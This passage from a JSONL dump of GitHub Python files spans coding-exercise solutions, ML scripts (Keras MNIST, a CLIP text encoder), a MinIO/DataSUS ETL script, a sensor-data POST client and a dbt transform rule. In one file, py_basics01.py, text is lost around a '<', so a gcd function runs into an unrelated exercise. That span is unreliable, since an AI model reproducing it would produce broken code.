', '', tmptext)\n tmptext = re.sub('
', '', tmptext)\n # tmptext = re.sub('width=\"235px\"', '', tmptext)\n # tmptext = re.sub('width=\"237px\"', '', tmptext)\n # tmptext = re.sub('width=\"552px\"', '', tmptext)\n return tmptext\n","repo_name":"camico/AmarokReader","sub_path":"conTEXT/filetypes/Allmusic.py","file_name":"Allmusic.py","file_ext":"py","file_size_in_byte":5597,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"28790024420","text":"'''\n Date : 11/11/2020\n Day : Wednessday\n Author : Md. Aminul Islam\n Topic : Problem Solving\n Problem : Sum and Prod\n Problem link : https://www.hackerrank.com/challenges/np-sum-and-prod/problem\n''' \n\nimport numpy as np\n\nn, m = map(int, input().split())\n\narr = np.array([input().split() for _ in range(n)], int)\n\narr_sum = np.sum(arr, axis = 0)\narr_prod = np.prod(arr_sum)\n\nprint(arr_prod)","repo_name":"aminul788/NSL-RAShip-Programm","sub_path":"python-basic/Problem-Solving/Sum_and_Prod.py","file_name":"Sum_and_Prod.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"9262663437","text":"import os\nimport numpy as np\nimport pandas as pd\nimport constant\n\nRANDOM_SEED = [12346, 12347, 12348]\nASR = constant.ASR\nTTS = constant.TTS\nDATASET = constant.DATASET\n\nimport sys, getopt\nimport utils\nimport constant\n\ndef printHelp() :\n print('calculate_averaged_result.py -a ')\n print(\"or\")\n print('calculate_averaged_result.py --approach ')\n\ndef main(argv):\n approach = \"\"\n try:\n opts, args = getopt.getopt(argv,\"ha:\",[\"approach=\"])\n except getopt.GetoptError:\n printHelp()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n printHelp()\n sys.exit()\n elif opt in (\"-a\", \"--approach\"):\n approach = arg\n \n if approach != \"\" :\n calculateAveragedResult(approach)\n else :\n print(\"Please specify the output file location\")\n\ndef calculateAveragedResult(approach) :\n\n df = {}\n avg = {}\n\n for tts in TTS:\n\n a = {}\n avg[tts] = {}\n\n for sr in ASR:\n\n b = {}\n\n avg[tts][sr] = {}\n\n for random_seed in RANDOM_SEED:\n\n fpath = \"result/%s/%s-%d/%s/%s/statistic.csv\" % (approach,\n DATASET, random_seed, tts, sr)\n b[random_seed] = pd.read_csv(fpath)\n\n a[sr] = b\n\n df[tts] = a\n\n avg = {}\n for tts in TTS:\n t = {}\n for sr in ASR:\n s = {}\n i = RANDOM_SEED[0]\n first = i\n temp = df[tts][sr][i]\n for i in RANDOM_SEED:\n if i != first:\n temp = temp.add(df[tts][sr][i], fill_value=0)\n t[sr] = temp/len(RANDOM_SEED)\n t[sr] = t[sr].drop(columns=[\"stc\", \"utc\"])\n avg[tts] = t\n\n for tts in TTS:\n for sr in ASR:\n folder = \"result/%s/%s-averaged/%s/%s/\" % (approach, DATASET,tts, sr)\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n fpath = folder + \"statistic.csv\"\n avg[tts][sr].to_csv(fpath, index=False, float_format='%.2f')\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"soarsmu/CrossASR","sub_path":"calculate_averaged_result.py","file_name":"calculate_averaged_result.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
+{"seq_id":"6204776345","text":"# https://leetcode.com/problems/remove-duplicates-from-sorted-array/\nfrom typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n insert_at = 1\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n nums[insert_at] = nums[i]\n insert_at += 1\n\n return insert_at\n","repo_name":"priyakdey/leetcode-solutions","sub_path":"arrays/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"33404068595","text":"# Добавить в Employee атрибут класса department = None\n# Унаследовать от Employee класс TechnicalStaff в котором реализовать метод класса change_department, позволяющий\n# менять департамент\n# Добавить в свойство info данные о департаменте\n\n# Добавить в TechnicalStaff статичный метод get_info(employee), получающий данные от работника и если работник из того же\n# департамента - выдавать приветствие.\n\nfrom hw_08_01 import Employee\n\n\nclass TechnicalStaff(Employee):\n department = 'Practical medicine'\n\n @staticmethod\n def get_info(employee):\n if TechnicalStaff.department == employee.department:\n return 'hi'\n return 'You are from different department'\n\n\nfirst_employee = Employee('Yulia', 'Sukach', 24, 'someone')\nassert first_employee.info['fullname'] == 'Yulia Sukach'\nassert first_employee.info['age'] == 24\n\n\nfirst_employee.change_department('Preventive medicine')\n\n\nsecond_employee = TechnicalStaff('Alesia', 'Ivanova', 25, 'dentist')\nassert second_employee.info['fullname'] == 'Alesia Ivanova'\nassert second_employee.info['age'] == 25\n\nassert TechnicalStaff.get_info(first_employee) == 'You are from different department'\n\nsecond_employee.change_department('Preventive medicine')\n\nassert TechnicalStaff.get_info(first_employee) == 'hi'\n\n\n\n\n","repo_name":"YuliaSukach/Python-HW","sub_path":"less_08/hw_08_02_03.py","file_name":"hw_08_02_03.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"5333006684","text":"def ispangram(str): \r\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\r\n for char in alphabet: \r\n if char not in str.lower(): \r\n return False\r\n \r\n return True\r\n\r\nstr = input(\"enter a sentence :\\n \")\r\nif ispangram(str):\r\n print('contains all alphabets')\r\nelse:\r\n print('does not contain all alphabets')\r\n","repo_name":"aryanjalla/advanceProgrammingPractices","sub_path":"Week 2/SET 14/ques1.py","file_name":"ques1.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"31251027477","text":"\r\nprint(\"hrllo world\")\r\n\r\nfor i,count in enumerate(range(500)):\r\n print(i, count,end = \"\\n============\\n\", sep = \"-\")\r\n \r\n# ================================================================\r\n \r\ntest = print(int((input(\"enter\")))*2)\r\n\r\n# ================================================================\r\n# positive even, positive odd, negative even, negative odd, zero\r\n\r\nx = float(input(\"enter no: \"))\r\n\r\nprint()\r\n\r\nif(x>0):\r\n if(x % 2 ==0):\r\n print(x,\"is positive even\")\r\n else:\r\n print(x,\"is positive odd\")\r\nelif(x<0):\r\n if(x % 2 ==0):\r\n print(x,\"is negative even\")\r\n else:\r\n print(x,\"is negative odd\")\r\nelse:\r\n print(x,\"is zero\")\r\nprint()\r\n\r\n\r\n\r\nif(x > 0) and (x % 2 == 0):\r\n print(x,\"is positive even\")\r\n\r\nelif(x > 0) and (x % 2 == 1):\r\n print(x,\"is positive odd\")\r\n\r\nelif(x < 0) and (x % 2 == 0):\r\n print(x,\"is negative even\")\r\n\r\nelif(x < 0) and (x % 2 == 1):\r\n print(x,\"is negative odd\")\r\n\r\nelse:\r\n print(x,\"is zero\")\r\n# ================================================================\r\n\r\n\r\nprint(\"camparision program\")\r\n\r\na = float(input(\"enter a: \"))\r\nb = float(input(\"enter b: \"))\r\n\r\nif(a > b):\r\n print(a,\"is greater than\",b)\r\nelif(a < b):\r\n print(b,\"is greater than\",b)\r\nelse:\r\n print(f\"{a} amd {b} are the same\")\r\n\r\n\r\na = int(input(\"enter your current salary: \"))\r\nk = int(input(\"enter increment per month: \"))\r\ny = int(input(\"years: \"))\r\n# your salary will be b after 5 yrs\r\n\r\nt = y * 12 # t is duration in months\r\nb = a + k*t\r\n\r\nprint(f\"your salary will be {b} rs after {y} years\")\r\n\r\n# sum of n natural numbers\r\n\r\nn = int(input(\"till which number you want sum ? \"))\r\n\r\n# using for loop\r\nsum=0\r\nfor i in range(1,n+1):\r\n sum += i\r\n\r\n# using formula\r\nsum = n*(n+1)/2\r\n\r\nprint(sum)\r\n\r\n# table of n\r\n\r\nn = int(input(\"you want table of ? 
\"))\r\n\r\nfor i in range(1,11):\r\n print(i*n,end = \" \")\r\n \r\nr = range(6)\r\nprint(r)\r\nprint(type(r))\r\nprint(list(r))\r\n\r\nprint(list(range(20,10,-2)))\r\nprint(list(range(20,10,2)))\r\n\r\n# smallest divisor of given number n \r\n\r\nn = int(input(\"enter number: \"))\r\n\r\nfor i in range(2,n+1):\r\n if(n % i == 0):\r\n print(f\"{i} is the smallest divisor of {n}\")\r\n break\r\n\r\n\r\ni = 2\r\nwhile (i<=n):\r\n if(n % i == 0):\r\n print(f\"{i} is the smallest divisor of {n}\")\r\n break\r\n i += 1\r\n\r\n\r\n# print numbers in the given list which are not divisible by 5\r\n\r\n\r\nl = [10, 16, 17, 18, 20, 22, 35]\r\n\r\n\r\nfor x in l:\r\n if( x % 5 == 0):\r\n continue\r\n print(x,end = \" \")\r\n\r\n\r\n# print tables of numbers from 1 to n\r\n\r\nn = int(input(\"enter number : \"))\r\n\r\nfor i in range(1,n+1):\r\n print(i,\": \", end = \" \")\r\n for j in range(1,11):\r\n print(i*j, end = \" \")\r\n print()\r\n\r\ndef f(): pass\r\nprint(type(f()))\r\n\r\n\r\nn = int(input(\"enter number : \")) \r\n\r\nfor i in range(n):\r\n if i == 0:\r\n print(\"*\")\r\n elif i == n-1:\r\n print(\"*\"*n)\r\n else:\r\n print(\"*\",\" \"*(i-2),\"*\")\r\n \r\ndef fib(n):\r\n if (n == 1) or (n == 2):\r\n return 1\r\n res = fib(n-1) + fib(n-2)\r\n return res\r\n\r\nprint(fib(6))\r\n\r\na = int(input(\"enter number a : \")) \r\nb = int(input(\"enter number b : \")) \r\n\r\ndef gcd(a, b):\r\n \r\n # code here to calculate and return gcd of a and b\r\n counter = a if (a geeks for geeks\r\n pat -> geeks\r\n o/p -> 0 10\r\n'''\r\n\r\ntext = \"geeks for geeksgeeksgeefs geeksian \"\r\npat = \"geeks\"\r\n\r\ni = 0\r\n\r\nwhile True:\r\n pos = text.find(pat,i)\r\n if pos == -1:\r\n break\r\n print(pos, end = \" \")\r\n i = pos + len(pat) \r\n \r\n \r\n''' i/p : text -> AAAAA\r\n pat -> AAA\r\n o/p -> 0 1 2\r\n'''\r\n\r\n#method01\r\ntext = \"AAAAA\"\r\npat = \"AAA\"\r\n\r\ni = 0\r\n\r\nwhile True:\r\n pos = text.find(pat,i)\r\n if pos == -1:\r\n break\r\n print(pos, end = \" \")\r\n i = pos + 1\r\n\r\n\r\n#method02\r\ntext = \"AAAAA\"\r\npat = \"AAA\"\r\n\r\npos = text.find(pat)\r\nwhile pos >= 0:\r\n print(pos, end = \" \")\r\n pos = text.find(pat,pos+1)\r\n \r\n \r\ndef reverseString(s):\r\n #Write your code below to reverse s and return it\r\n s_list = list(s)\r\n reverse_string = []\r\n for i in range(len(s_list)):\r\n j = len(s_list)-(i+1)\r\n reverse_string.append(s_list[j])\r\n return \"\".join(reverse_string)\r\n\r\ndef reverseString(s):\r\n return s[::-1]\r\n\r\nprint(reverseString(\"hello\"))\r\n\r\n\r\n\r\n","repo_name":"arihantvyavhare/PythonStuff","sub_path":"py_basics01.py","file_name":"py_basics01.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20736963509","text":"import pickle\nimport os\n\nscores = list()\n\ndef input_scores():\n score=int(input())\n if score > 0:\n scores.append(score)\n return score \n\ndef get_average(scores):\n return sum(scores)/len(scores)\n\ndef show_scores(avg):\n print(\"개인점수:\",end=\" \")\n for i in scores:\n print(f\"{i}\",end=\" \")\n print()\n print(\"평균: \",avg)\n\ndef search(scores,score):\n count =0\n for i in scores:\n find=0\n count +=1\n if i == score:\n print(f\"{score}점은 {count}번 학생의 점수입니다.\")\n find = score\n break\n if find == 0:\n print(f\"{score}점을 받은 학생은 없습니다.\")\n\nfilepath = 'C:/Users/ahn/Desktop/mlData/'\nfilename = 'score.bin'\ndef save(scores):\n with open(f'{filepath}{filename}','wb') as file:\n pickle.dump(scores,file)\n\ndef load():\n with open(filename,'rb') as file:\n scores=pickle.load(file)\n return scores\n\ni=1\n\n \n\nif not(os.path.exists(filename)):\n while True: \n print(f\"#{i}?\",end=\" \")\n n = input_scores()\n i+=1\n if n<0:\n break\n save(scores)\nelse:\n result = load()\n avg = get_average(result)\n print('[파일 읽기]\\n')\n\n print('[점수 출력]')\n show_scores(avg)\n","repo_name":"ayz1070/python","sub_path":"python programming/hw10.py","file_name":"hw10.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"37912505746","text":"from queue import Queue\n\nq = Queue()\nn = int(input())\nq.put(\"1\")\n\nwhile(n):\n\tn -= 1\n\n\ts1 = q.get()\n\n\tprint (s1)\n\n\ts2 = s1\n\n\tq.put(s1+\"0\")\n\n\tq.put(s2+\"1\")\n\n","repo_name":"pranavdave893/Leetcode","sub_path":"binary_with_queue.py","file_name":"binary_with_queue.py","file_ext":"py","file_size_in_byte":155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71819118509","text":"import pygame\nimport sys\nimport random\nfrom Block import *\n\nVERTICAL = 10\nHORIZONTAL = 15\nTAILLE_CASE = 40\n\nFENETRE = pygame.display.set_mode(size=(VERTICAL * TAILLE_CASE, HORIZONTAL * TAILLE_CASE))\nFPS = pygame.time.Clock()\n \n \nclass Cherry:\n def __init__(self):\n x = random.randint(0,VERTICAL -1)\n y = random.randint(0,HORIZONTAL -1)\n self.block = Block(x, y)\n \n def draw_Cherry(self):\n rect = pygame.Rect(self.block.x * TAILLE_CASE,self.block.y * TAILLE_CASE, TAILLE_CASE, TAILLE_CASE)\n pygame.draw.rect(FENETRE,(255, 56, 24), rect)","repo_name":"Evolinki/SnakePygame","sub_path":"Cherry.py","file_name":"Cherry.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"29974759666","text":"import os\n\nimport keras\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.datasets import mnist\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\nprint(X_train.shape)\n# X_train = X_train.reshape(-1, 28 * 28) # without normalization\n# X_test = X_test.reshape(-1, 28 * 28)\n\nX_train = X_train.reshape(-1,28*28)/255.0 # Normalization increases accuracy\nX_test = X_test.reshape(-1,28*28)/255.0\nprint(X_train.shape)\n\n# Sequential API\n# model = keras.Sequential([ # passing layers as list to model.\n# keras.Input(shape=(28*28)),\n# layers.Dense(512, activation='relu'),\n# layers.Dense(256, activation='relu'),\n# layers.Dense(10)\n# ])\n# print(model.summary()) // if we include input layer.\n\n# Sequential API - 2\nmodel = keras.Sequential()\nmodel.add(layers.Input(shape=(28*28)))\nmodel.add(layers.Dense(512, activation='relu'))\nmodel.add(layers.Dense(256, activation='relu',name='my_layer'))\nmodel.add(layers.Dense(10))\n\nmodel = keras.Model(inputs = model.inputs,\n # outputs = [model.layers[-1].output]\n #outputs = [model.get_layer('my_layer').output] # We can access layers by their name.\n outputs = [layer.output for layer in model.layers])\n\nfeature = model.predict(X_train)\nfor features in feature:\n print(features.shape)\n# print('feature shape :',feature.shape)\n\n\n# Functional API\n# input = layers.Input(shape=(28 * 28))\n# x = layers.Dense(512, activation='relu',name='first_layer')(input)\n# x = layers.Dense(256, activation='relu',name='second_layer')(x)\n# output = layers.Dense(10, activation='softmax')(x)\n# model = keras.Model(inputs=input, outputs=output)\n\n# import sys\n# sys.exit()\nmodel.compile(\n loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True), # Only set it to True if you are not using softmax in model.\n optimizer=keras.optimizers.legacy.Adam(learning_rate=0.001),\n metrics=['accuracy']\n)\n\nmodel.fit(X_train, y_train, epochs=5, verbose=2)\nprint(model.summary())\nmodel.evaluate(X_test, y_test, verbose=2)\n","repo_name":"Asrar-Ahammad/tensorflowPractice","sub_path":"02_neuralNetwork.py","file_name":"02_neuralNetwork.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"36893205637","text":"import time\nfrom utils import readInput\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef loadInput():\n lines = readInput(\"prova.txt\")\n lines = readInput(\"input_8.txt\")\n grid = np.zeros(shape=(len(lines[0]), len(lines)))\n\n for y in range(len(lines)):\n for x in range(len(lines[0])):\n grid[x, y] = int(lines[y][x])\n return grid\n\ndef draw_forest(grid):\n plt.imshow(grid)\n plt.show()\n\n\ndef part1(grid):\n xmax, ymax = grid.shape\n visible = np.zeros(shape=(xmax, ymax))\n\n for y in range(ymax):\n height = grid[0, y]\n visible[0, y] = 1\n for x in range(1, xmax):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n height = grid[-1, y]\n visible[-1, y] = 1\n for x in range(xmax-1, 0, -1):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n for x in range(xmax):\n height = grid[x, 0]\n visible[x, 0] = 1\n for y in range(1, ymax):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n height = grid[x, -1]\n visible[x, -1] = 1\n for y in range(ymax-1, 0, -1):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n print (\"🎄 Part 1: {}\".format(visible.sum()))\n\ndef part2(grid):\n xmax, ymax = grid.shape\n dirs = [(0, 1), (1, 0), (-1, 0), (0, -1)]\n scenic_score = 0\n for x in range(xmax):\n for y in range(ymax):\n score = []\n for d in dirs:\n steps = 1\n visible = 0\n while True:\n new_x, new_y = x + steps*d[0], y + steps*d[1]\n if 0 <= new_x < xmax and 0 <= new_y < ymax:\n if grid[new_x, new_y] < grid[x, y]:\n visible += 1\n else:\n visible += 1\n break\n else:\n break\n steps += 1\n score.append(visible)\n scenic_score = max(np.prod(score), scenic_score)\n\n print (\"🎄🎅 Part 2: {}\".format(scenic_score))\n\nprint(\"⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄\")\nprint(\"⛄ Day 8 ⛄\")\nprint(\"⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄\")\n\ngrid = loadInput()\ndraw_forest(grid)\nquit()\nt0 = time.time()\npart1(grid)\nprint (\"Time: {:.5f}\".format(time.time()-t0))\n\nt0 = time.time()\npart2(grid)\nprint (\"Time: {:.5f}\".format(time.time()-t0))\n","repo_name":"matteosan1/AoC","sub_path":"2022/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"40017156529","text":"import io\nimport os\n\nimport pandas as pd\nfrom dotenv import load_dotenv\nfrom minio import Minio\nfrom pysus.online_data.CNES import download\nfrom pysus.online_data.sinasc import download as download_sinasc\n\nload_dotenv()\n\n\ndef csv_to_parquet():\n landing_bucket_name = \"landing\"\n curated_bucket_name = \"curated\"\n minio_endpoint = \"localhost:9100\"\n minio_access_key = os.getenv(\"minio_access_key\")\n minio_secret_key = os.getenv(\"minio_secret_key\")\n object_name_from = \"events-sample.csv\"\n object_name_to = \"events-sample.parquet\"\n\n client = Minio(\n minio_endpoint,\n access_key=minio_access_key,\n secret_key=minio_secret_key,\n secure=False\n )\n\n found = client.bucket_exists(landing_bucket_name)\n if not found:\n client.make_bucket(landing_bucket_name)\n else:\n print(f'Bucket {landing_bucket_name} já existe!')\n\n file = client.get_object(landing_bucket_name, object_name=object_name_from)\n\n df = pd.read_csv(file)\n bytes_data = df.to_parquet()\n buffer = io.BytesIO(bytes_data)\n\n print(buffer)\n client.put_object(\n curated_bucket_name,\n object_name_to,\n buffer,\n len(bytes_data),\n 'application/parquet'\n )\n\n\ndef download_cnes():\n df = download_sinasc('SE', 2015)\n print(\"OK: \" + df.head())\n df = download(group=\"ST\", state=\"DF\", year=2021, month=1, cache=True)\n print(\"OOOOK\")\n print(\"GO\" + df.head())\n\n\ndef cnes_download():\n print(\"!\")\n\n\n\nif __name__ == \"__main__\":\n download_cnes()\n","repo_name":"GleytonLima/datasus-elt","sub_path":"src/testes_local.py","file_name":"testes_local.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"41259422736","text":"class Solution:\n def searchInsert(self, nums: 'List[int]', target: 'int') -> 'int':\n lens = len(nums)\n l, r = 0, lens-1\n while l <= r:\n mid = int((l+r)/2)\n if nums[mid] < target:\n l = mid+1\n else:\n r = mid-1\n # if l-1>=0 and nums[l] \n return l\n\nif __name__ == \"__main__\":\n print(\n Solution().searchInsert(\n [1, 2, 3, 4, 5], 2.5\n )\n )","repo_name":"kimroniny/ACM","sub_path":"LeetCode/0035/35.py","file_name":"35.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"38619335597","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.models import Model\nfrom keras.layers import Permute, Dense, LayerNormalization, Embedding\nimport tensorflow_addons as tfa\nfrom .layers import quick_gelu, Layer\n\nclass CLIPAttention(Layer):\n def __init__(self):\n super().__init__()\n self.emb_dim = 768\n self.num_heads = 12\n self.head_dim = self.emb_dim // self.num_heads\n self.scale = self.head_dim ** -0.5\n self.q_proj = Dense(self.emb_dim)\n self.k_proj = Dense(self.emb_dim)\n self.v_proj = Dense(self.emb_dim)\n self.out_proj = Dense(self.emb_dim)\n\n def _shape(self, tensor, seq_len: int, batch_size: int):\n a = tf.reshape(tensor, (batch_size, seq_len, self.num_heads, self.head_dim))\n\n return Permute((2, 1, 3))(a) # bs, n_head, seq_len, head_dim\n\n def call(self, inputs):\n hidden_states, casual_attention_mask = inputs\n batch_size, tgt_len, emb_dim = hidden_states.shape\n query_states = self.q_proj(hidden_states) * self.scale\n key_states = self._shape(self.k_proj(hidden_states), tgt_len, -1)\n value_states = self._shape(self.v_proj(hidden_states), tgt_len, -1)\n\n proj_shape = (-1, tgt_len, self.head_dim)\n query_states = self._shape(query_states, tgt_len, -1)\n query_states = tf.reshape(query_states, proj_shape)\n key_states = tf.reshape(key_states, proj_shape)\n\n src_len = tgt_len\n value_states = tf.reshape(value_states, proj_shape)\n attn_weights = query_states @ Permute((2, 1))(key_states)\n attn_weights = tf.reshape(attn_weights, (-1, self.num_heads, tgt_len, src_len))\n attn_weights = attn_weights + casual_attention_mask\n attn_weights = tf.reshape(attn_weights, (-1, tgt_len, src_len))\n\n attn_weights = tf.nn.softmax(attn_weights)\n attn_output = attn_weights @ value_states\n attn_output = tf.reshape(attn_output, (-1, self.num_heads, tgt_len, self.head_dim))\n attn_output = Permute((2, 1, 3))(attn_output)\n attn_output = tf.reshape(attn_output, (-1, tgt_len, emb_dim))\n\n return self.out_proj(attn_output)\n \n\nclass CLIPEncoderLayer(Layer):\n def __init__(self):\n super().__init__()\n self.layer_norm1 = LayerNormalization(epsilon=1e-5)\n self.self_attn = CLIPAttention()\n self.layer_norm2 = LayerNormalization(epsilon=1e-5)\n self.fc1 = Dense(3072)\n self.fc2 = Dense(768)\n \n def call(self, inputs):\n hidden_states, casual_attention_mask = inputs\n residual = hidden_states\n \n hidden_states = self.layer_norm1(hidden_states)\n hidden_states = self.self_attn([hidden_states, casual_attention_mask])\n hidden_states = residual + hidden_states\n residual = hidden_states\n hidden_states = self.layer_norm2(hidden_states)\n hidden_states = self.fc1(hidden_states)\n hidden_states = quick_gelu(hidden_states)\n hidden_states = self.fc2(hidden_states)\n\n return residual + hidden_states\n\nclass CLIPEncoder(Layer):\n def __init__(self):\n super().__init__()\n self.layers = [CLIPEncoderLayer() for _ in range(12)]\n\n def call(self, x):\n [hidden_states, casual_attention_mask] = x\n for layer in self.layers:\n hidden_states = layer([hidden_states, casual_attention_mask])\n return hidden_states\n\n\nclass CLIPTextEmbedding(Layer):\n def __init__(self, n_words=77):\n super().__init__()\n # Token and Position Embedding Layer\n self.token_embedding = Embedding(\n 49408, 768, name=\"token_embedding\"\n )\n self.position_embedding = Embedding(\n n_words, 768, name=\"position_embedding\"\n )\n\n def call(self, x):\n input_ids, pos_ids = x\n word_embeddings = self.token_embedding(input_ids)\n pos_embeddings = 
self.position_embedding(pos_ids)\n\n return word_embeddings + pos_embeddings\n\nclass CLIPTextTransformer(Model):\n def __init__(self, n_words=77):\n super().__init__()\n self.embeddings = CLIPTextEmbedding(n_words=n_words)\n self.encoder = CLIPEncoder()\n self.final_layer_norm = LayerNormalization(epsilon=1e-5)\n self.casual_attention_mask = tf.constant(\n np.triu(np.ones((1, 1, 77, 77), dtype='float32') * -np.inf, k=1)\n )\n\n def call(self, inputs):\n input_ids, pos_ids = inputs\n x = self.embeddings([input_ids, pos_ids])\n x = self.encoder([x, self.casual_attention_mask])\n\n return self.final_layer_norm(x)\n ","repo_name":"Raghvender1205/AI_From_Scratch","sub_path":"DiffusionModels/StableDiffusion/stablediffusion/clip_encoder.py","file_name":"clip_encoder.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"38"}
+{"seq_id":"7466316408","text":"# importing the requests library\nimport requests\nimport json\nimport logging\nimport datetime\n\nlogging.basicConfig(level=logging.DEBUG,\n format='[%(levelname)s] (%(threadName)-10s) %(message)s',\n )\n\nclass Request:\n # defining the api-endpoint\n API_ENDPOINT = \"http://192.168.0.11:3000/listnotes\"\n\n # your API key here\n API_KEY = \"XXXXXXXXXXXXXXXXX\"\n\n acc = {'aX': [],\n 'aY': [],\n 'aZ': []}\n\n mag = {'mX': [],\n 'mY': [],\n 'mZ': []}\n\n timestamp = '1000111111'\n\n # 'api_paste_format': 'python',\n # data to be sent to api\n data = {'title': 'msg from node number correct',\n 'acc': acc,\n 'mag': mag,\n 'timestamp': timestamp}\n\n\n def sendPost(self,data):\n listValues = data['values']\n actualTime = str(round(datetime.datetime.now().timestamp(),2))\n dataPackage = {'title': 'meranickoRanicko', 'timestamp': actualTime, 'meranie': []}\n listValues = [x.replace(\"\\r\\n\",\"\") for x in listValues]\n for i in range(len(listValues)):\n aX, aY, aZ, mX, mY, mZ, actualTime = listValues[i].split(\",\")\n acc = {'aX': aX,\n 'aY': aY,\n 'aZ': aZ}\n\n mag = {'mX': int(mX),\n 'mY': int(mY),\n 'mZ': int(mZ)}\n\n # 'api_paste_format': 'python',\n # data to be sent to api\n dataDictionary = {'acc': acc, 'mag': mag, 'timestamp': actualTime}\n dataPackage['meranie'].append(dataDictionary)\n\n # sending post request and saving response as response object\n # r = requests.post(url=Request.API_ENDPOINT, json=Request.data)\n # logging.debug(\"Sending Request with: %i elements\" % len(dataDictionary))\n\n r = requests.post(url=Request.API_ENDPOINT, json=dataPackage)\n\n # extracting response text\n pastebin_url = r.text\n # logging.debug(\"The pastebin URL is:%s\" % pastebin_url)\n","repo_name":"UserTomas/device_monitoring","sub_path":"Raspberry/APIrequests.py","file_name":"APIrequests.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"41801543812","text":"from typing import Set\n\nfrom typing_extensions import override\n\nfrom dbt_semantic_interfaces.enum_extension import assert_values_exhausted\nfrom dbt_semantic_interfaces.errors import ModelTransformError\nfrom dbt_semantic_interfaces.implementations.metric import PydanticMetricInputMeasure\nfrom dbt_semantic_interfaces.implementations.semantic_manifest import (\n PydanticSemanticManifest,\n)\nfrom dbt_semantic_interfaces.protocols import ProtocolHint\nfrom dbt_semantic_interfaces.transformations.transform_rule import (\n SemanticManifestTransformRule,\n)\nfrom dbt_semantic_interfaces.type_enums import MetricType\n\n\nclass AddInputMetricMeasuresRule(ProtocolHint[SemanticManifestTransformRule[PydanticSemanticManifest]]):\n \"\"\"Add all measures corresponding to the input metrics of the derived metric.\"\"\"\n\n @override\n def _implements_protocol(self) -> SemanticManifestTransformRule[PydanticSemanticManifest]: # noqa: D\n return self\n\n @staticmethod\n def _get_measures_for_metric(\n semantic_manifest: PydanticSemanticManifest, metric_name: str\n ) -> Set[PydanticMetricInputMeasure]:\n \"\"\"Returns a unique set of input measures for a given metric.\"\"\"\n measures: Set = set()\n matched_metric = next(\n iter((metric for metric in semantic_manifest.metrics if metric.name == metric_name)), None\n )\n if matched_metric:\n if matched_metric.type is MetricType.SIMPLE or matched_metric.type is MetricType.CUMULATIVE:\n assert (\n matched_metric.type_params.measure is not None\n ), f\"{matched_metric} should have a measure defined, but it does not.\"\n measures.add(matched_metric.type_params.measure)\n elif matched_metric.type is MetricType.DERIVED or matched_metric.type is MetricType.RATIO:\n for input_metric in matched_metric.input_metrics:\n measures.update(\n AddInputMetricMeasuresRule._get_measures_for_metric(semantic_manifest, input_metric.name)\n )\n else:\n assert_values_exhausted(matched_metric.type)\n else:\n raise ModelTransformError(f\"Metric '{metric_name}' is not configured as a metric in the model.\")\n return measures\n\n @staticmethod\n def transform_model(semantic_manifest: PydanticSemanticManifest) -> PydanticSemanticManifest: # noqa: D\n for metric in semantic_manifest.metrics:\n measures = AddInputMetricMeasuresRule._get_measures_for_metric(semantic_manifest, metric.name)\n assert len(metric.type_params.input_measures) == 0, f\"{metric} should not have measures predefined\"\n metric.type_params.input_measures = list(measures)\n\n return 